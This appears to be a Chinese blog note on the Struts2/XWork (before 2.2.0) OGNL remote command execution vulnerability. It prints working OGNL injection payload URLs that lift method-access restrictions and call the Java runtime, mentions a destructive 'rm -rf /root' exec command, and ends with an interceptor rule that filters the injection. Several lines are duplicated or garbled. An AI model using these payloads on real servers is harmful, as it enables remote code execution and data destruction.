Strutsexploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。
漏洞名称:Struts2/XWork<2.2.0RemoteCommandExecutionVulnerability
相关介绍:
http://www.exploit-db.com/exploits/14360/
http://sebug.net/exploit/19954/
?user.address.city=Bishkek&user['favoriteDrink']=kumys
?user.address.city=Bishkek&user['favoriteDrink']=kumys
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys")
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#[email protected]@getRuntime()))=1
java.lang.Runtime.getRuntime().exit(1);
java.lang.Runtime.getRuntime().exit(1);
java.lang.Runtime.getRuntime().exec("rm�Crf/root")
java.lang.Runtime.getRuntime().exec("rm �Crf /root"),只要有权限就可以删除任何一个目录。
<s:beanid="UserUtil"name="cn.com.my_corner.util.UserUtil"></s:bean>
<s:propertyvalue="#UserUtil.getType().get(cType.toString())"/>
<s:bean id="UserUtil" name="cn.com.my_corner.util.UserUtil"></s:bean> <s:property value="#UserUtil.getType().get(cType.toString())" />
<interceptor-refname="params">
<paramname="excludeParams">.*\\u0023.*</param>
</interceptor-ref>
<interceptor-ref name="params"> <param name="excludeParams">.*\\u0023.*</param> </interceptor-ref>
http://www.iteye.com/topic/720209